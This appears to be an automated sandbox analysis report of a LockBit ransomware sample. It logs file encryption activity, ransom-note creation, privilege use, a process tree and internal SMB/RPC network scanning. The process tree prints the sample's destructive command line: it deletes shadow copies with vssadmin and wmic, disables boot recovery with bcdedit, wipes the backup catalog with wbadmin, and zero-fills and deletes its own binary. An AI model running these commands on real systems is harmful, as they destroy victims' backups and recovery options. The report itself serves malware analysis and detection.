| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_4.m4a | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyShare-Dark.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_KMS_Client-ul.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_WHATSNEW.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.scale-400.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Standard.targetsize-16_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-64_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.scale-100.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\iheart-radio.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\mshta.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\WallpaperStyle = "2" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2776 -ip 2776
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 1676
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| N/A | 10.127.0.243:445 | N/A | tcp |
| N/A | 10.127.0.205:445 | N/A | tcp |
| N/A | 10.127.0.1:445 | N/A | tcp |
| N/A | 10.127.0.203:445 | N/A | tcp |
| N/A | 10.127.0.220:445 | N/A | tcp |
| N/A | 10.127.0.225:445 | N/A | tcp |
| N/A | 10.127.0.207:445 | N/A | tcp |
| N/A | 10.127.0.190:445 | N/A | tcp |
| N/A | 10.127.0.240:445 | N/A | tcp |
| N/A | 10.127.0.239:445 | N/A | tcp |
| N/A | 10.127.0.229:445 | N/A | tcp |
| N/A | 10.127.0.214:445 | N/A | tcp |
| N/A | 10.127.0.193:445 | N/A | tcp |
| N/A | 10.127.0.232:445 | N/A | tcp |
| N/A | 10.127.0.226:445 | N/A | tcp |
| N/A | 10.127.0.187:445 | N/A | tcp |
| N/A | 10.127.0.199:445 | N/A | tcp |
| N/A | 10.127.0.189:445 | N/A | tcp |
| N/A | 10.127.0.218:445 | N/A | tcp |
| N/A | 10.127.0.55:445 | N/A | tcp |
| N/A | 10.127.0.244:445 | N/A | tcp |
| N/A | 10.127.0.202:445 | N/A | tcp |
| N/A | 10.127.0.228:445 | N/A | tcp |
| N/A | 10.127.0.251:445 | N/A | tcp |
| N/A | 10.127.0.235:445 | N/A | tcp |
| N/A | 10.127.0.238:445 | N/A | tcp |
| N/A | 10.127.0.223:445 | N/A | tcp |
| N/A | 10.127.0.236:445 | N/A | tcp |
| N/A | 10.127.0.208:445 | N/A | tcp |
| N/A | 10.127.0.246:445 | N/A | tcp |
| N/A | 10.127.0.196:445 | N/A | tcp |
| N/A | 10.127.0.138:445 | N/A | tcp |
| N/A | 10.127.0.253:445 | N/A | tcp |
| N/A | 10.127.0.217:445 | N/A | tcp |
| N/A | 10.127.0.195:445 | N/A | tcp |
| N/A | 10.127.0.230:445 | N/A | tcp |
| N/A | 10.127.0.221:445 | N/A | tcp |
| N/A | 10.127.0.211:445 | N/A | tcp |
| N/A | 10.127.0.222:445 | N/A | tcp |
| N/A | 10.127.0.242:445 | N/A | tcp |
| N/A | 10.127.0.233:445 | N/A | tcp |
| N/A | 10.127.0.248:445 | N/A | tcp |
| N/A | 10.127.0.198:445 | N/A | tcp |
| N/A | 10.127.0.197:445 | N/A | tcp |
| N/A | 10.127.0.213:445 | N/A | tcp |
| N/A | 10.127.0.192:445 | N/A | tcp |
| N/A | 10.127.0.188:445 | N/A | tcp |
| N/A | 10.127.0.216:445 | N/A | tcp |
| N/A | 10.127.0.234:445 | N/A | tcp |
| N/A | 10.127.0.201:445 | N/A | tcp |
| N/A | 10.127.0.194:445 | N/A | tcp |
| N/A | 10.127.0.212:445 | N/A | tcp |
| N/A | 10.127.0.227:445 | N/A | tcp |
| N/A | 10.127.0.245:445 | N/A | tcp |
| N/A | 10.127.0.241:445 | N/A | tcp |
| N/A | 10.127.0.206:445 | N/A | tcp |
| N/A | 10.127.0.204:445 | N/A | tcp |
| N/A | 10.127.0.200:445 | N/A | tcp |
| N/A | 10.127.0.252:445 | N/A | tcp |
| N/A | 10.127.0.250:445 | N/A | tcp |
| N/A | 10.127.0.247:445 | N/A | tcp |
| N/A | 10.127.0.237:445 | N/A | tcp |
| N/A | 10.127.0.191:445 | N/A | tcp |
| N/A | 10.127.0.249:445 | N/A | tcp |
| N/A | 10.127.0.215:445 | N/A | tcp |
| N/A | 10.127.0.210:445 | N/A | tcp |
| N/A | 10.127.0.27:445 | N/A | tcp |
| N/A | 10.127.0.224:445 | N/A | tcp |
| N/A | 10.127.0.209:445 | N/A | tcp |
| N/A | 10.127.0.219:445 | N/A | tcp |
| N/A | 10.127.0.131:445 | N/A | tcp |
| N/A | 10.127.0.179:445 | N/A | tcp |
| N/A | 10.127.0.176:445 | N/A | tcp |
| N/A | 10.127.0.177:445 | N/A | tcp |
| N/A | 10.127.0.170:445 | N/A | tcp |
| N/A | 10.127.0.180:445 | N/A | tcp |
| N/A | 10.127.0.121:445 | N/A | tcp |
| N/A | 10.127.0.184:445 | N/A | tcp |
| N/A | 10.127.0.141:445 | N/A | tcp |
| N/A | 10.127.0.165:445 | N/A | tcp |
| N/A | 10.127.0.146:445 | N/A | tcp |
| N/A | 10.127.0.154:445 | N/A | tcp |
| N/A | 10.127.0.140:445 | N/A | tcp |
| N/A | 10.127.0.168:445 | N/A | tcp |
| N/A | 10.127.0.158:445 | N/A | tcp |
| N/A | 10.127.0.159:445 | N/A | tcp |
| N/A | 10.127.0.156:445 | N/A | tcp |
| N/A | 10.127.0.183:445 | N/A | tcp |
| N/A | 10.127.0.175:445 | N/A | tcp |
| N/A | 10.127.0.133:445 | N/A | tcp |
| N/A | 10.127.0.143:445 | N/A | tcp |
| N/A | 10.127.0.139:445 | N/A | tcp |
| N/A | 10.127.0.144:445 | N/A | tcp |
| N/A | 10.127.0.136:445 | N/A | tcp |
| N/A | 10.127.0.172:445 | N/A | tcp |
| N/A | 10.127.0.120:445 | N/A | tcp |
| N/A | 10.127.0.151:445 | N/A | tcp |
| N/A | 10.127.0.137:445 | N/A | tcp |
| N/A | 10.127.0.118:445 | N/A | tcp |
| N/A | 10.127.0.160:445 | N/A | tcp |
| N/A | 10.127.0.155:445 | N/A | tcp |
| N/A | 10.127.0.119:445 | N/A | tcp |
| N/A | 10.127.0.115:445 | N/A | tcp |
| N/A | 10.127.0.181:445 | N/A | tcp |
| N/A | 10.127.0.134:445 | N/A | tcp |
| N/A | 10.127.0.148:445 | N/A | tcp |
| N/A | 10.127.0.173:445 | N/A | tcp |
| N/A | 10.127.0.114:445 | N/A | tcp |
| N/A | 10.127.0.153:445 | N/A | tcp |
| N/A | 10.127.0.182:445 | N/A | tcp |
| N/A | 10.127.0.145:445 | N/A | tcp |
| N/A | 10.127.0.186:445 | N/A | tcp |
| N/A | 10.127.0.161:445 | N/A | tcp |
| N/A | 10.127.0.178:445 | N/A | tcp |
| N/A | 10.127.0.116:445 | N/A | tcp |
| N/A | 10.127.0.185:445 | N/A | tcp |
| N/A | 10.127.0.149:445 | N/A | tcp |
| N/A | 10.127.0.163:445 | N/A | tcp |
| N/A | 10.127.0.117:445 | N/A | tcp |
| N/A | 10.127.0.171:445 | N/A | tcp |
| N/A | 10.127.0.142:445 | N/A | tcp |
| N/A | 10.127.0.174:445 | N/A | tcp |
| N/A | 10.127.0.164:445 | N/A | tcp |
| N/A | 10.127.0.132:445 | N/A | tcp |
| N/A | 10.127.0.167:445 | N/A | tcp |
| N/A | 10.127.0.147:445 | N/A | tcp |
| N/A | 10.127.0.130:445 | N/A | tcp |
| N/A | 10.127.0.169:445 | N/A | tcp |
| N/A | 10.127.0.162:445 | N/A | tcp |
| N/A | 10.127.0.152:445 | N/A | tcp |
| N/A | 10.127.0.157:445 | N/A | tcp |
| N/A | 10.127.0.150:445 | N/A | tcp |
| N/A | 10.127.0.135:445 | N/A | tcp |
| N/A | 10.127.0.166:445 | N/A | tcp |
| N/A | 10.127.0.83:445 | N/A | tcp |
| N/A | 10.127.0.101:445 | N/A | tcp |
| N/A | 10.127.0.79:445 | N/A | tcp |
| N/A | 10.127.0.68:445 | N/A | tcp |
| N/A | 10.127.0.63:445 | N/A | tcp |
| N/A | 10.127.0.92:445 | N/A | tcp |
| N/A | 10.127.0.60:445 | N/A | tcp |
| N/A | 10.127.0.129:445 | N/A | tcp |
| N/A | 10.127.0.112:445 | N/A | tcp |
| N/A | 10.127.0.90:445 | N/A | tcp |
| N/A | 10.127.0.62:445 | N/A | tcp |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.9:135 | tcp | |
| N/A | 10.127.0.10:135 | tcp | |
| N/A | 10.127.0.11:135 | tcp | |
| N/A | 10.127.0.12:135 | tcp | |
| N/A | 10.127.0.13:135 | tcp | |
| N/A | 10.127.0.14:135 | tcp | |
| N/A | 10.127.0.15:135 | tcp | |
| N/A | 10.127.0.16:135 | tcp | |
| N/A | 10.127.0.17:135 | tcp | |
| N/A | 10.127.0.19:135 | tcp | |
| N/A | 10.127.0.18:135 | tcp | |
| N/A | 10.127.0.20:135 | tcp | |
| N/A | 10.127.0.21:135 | tcp | |
| N/A | 10.127.0.22:135 | tcp | |
| N/A | 10.127.0.23:135 | tcp | |
| N/A | 10.127.0.24:135 | tcp | |
| N/A | 10.127.0.25:135 | tcp | |
| N/A | 10.127.0.26:135 | tcp | |
| N/A | 10.127.0.27:135 | tcp | |
| N/A | 10.127.0.28:135 | tcp | |
| N/A | 10.127.0.29:135 | tcp | |
| N/A | 10.127.0.30:135 | tcp | |
| N/A | 10.127.0.31:135 | tcp | |
| N/A | 10.127.0.32:135 | tcp | |
| N/A | 10.127.0.33:135 | tcp | |
| N/A | 10.127.0.34:135 | tcp | |
| N/A | 10.127.0.35:135 | tcp | |
| N/A | 10.127.0.36:135 | tcp | |
| N/A | 10.127.0.37:135 | tcp | |
| N/A | 10.127.0.38:135 | tcp | |
| N/A | 10.127.0.39:135 | tcp | |
| N/A | 10.127.0.40:135 | tcp | |
| N/A | 10.127.0.41:135 | tcp | |
| N/A | 10.127.0.42:135 | tcp | |
| N/A | 10.127.0.43:135 | tcp | |
| N/A | 10.127.0.44:135 | tcp | |
| N/A | 10.127.0.45:135 | tcp | |
| N/A | 10.127.0.46:135 | tcp | |
| N/A | 10.127.0.47:135 | tcp | |
| N/A | 10.127.0.48:135 | tcp | |
| N/A | 10.127.0.49:135 | tcp | |
| N/A | 10.127.0.50:135 | tcp | |
| N/A | 10.127.0.51:135 | tcp | |
| N/A | 10.127.0.52:135 | tcp | |
| N/A | 10.127.0.53:135 | tcp | |
| N/A | 10.127.0.54:135 | tcp | |
| N/A | 10.127.0.55:135 | tcp | |
| N/A | 10.127.0.56:135 | tcp | |
| N/A | 10.127.0.57:135 | tcp | |
| N/A | 10.127.0.58:135 | tcp | |
| N/A | 10.127.0.59:135 | tcp | |
| N/A | 10.127.0.60:135 | tcp | |
| N/A | 10.127.0.61:135 | tcp | |
| N/A | 10.127.0.62:135 | tcp | |
| N/A | 10.127.0.63:135 | tcp | |
| N/A | 10.127.0.64:135 | tcp | |
| N/A | 10.127.0.65:135 | tcp | |
| N/A | 10.127.0.66:135 | tcp | |
| N/A | 10.127.0.67:135 | tcp | |
| N/A | 10.127.0.68:135 | tcp | |
| N/A | 10.127.0.69:135 | tcp | |
| N/A | 10.127.0.70:135 | tcp | |
| N/A | 10.127.0.71:135 | tcp | |
| N/A | 10.127.0.72:135 | tcp | |
| N/A | 10.127.0.73:135 | tcp | |
| N/A | 10.127.0.74:135 | tcp | |
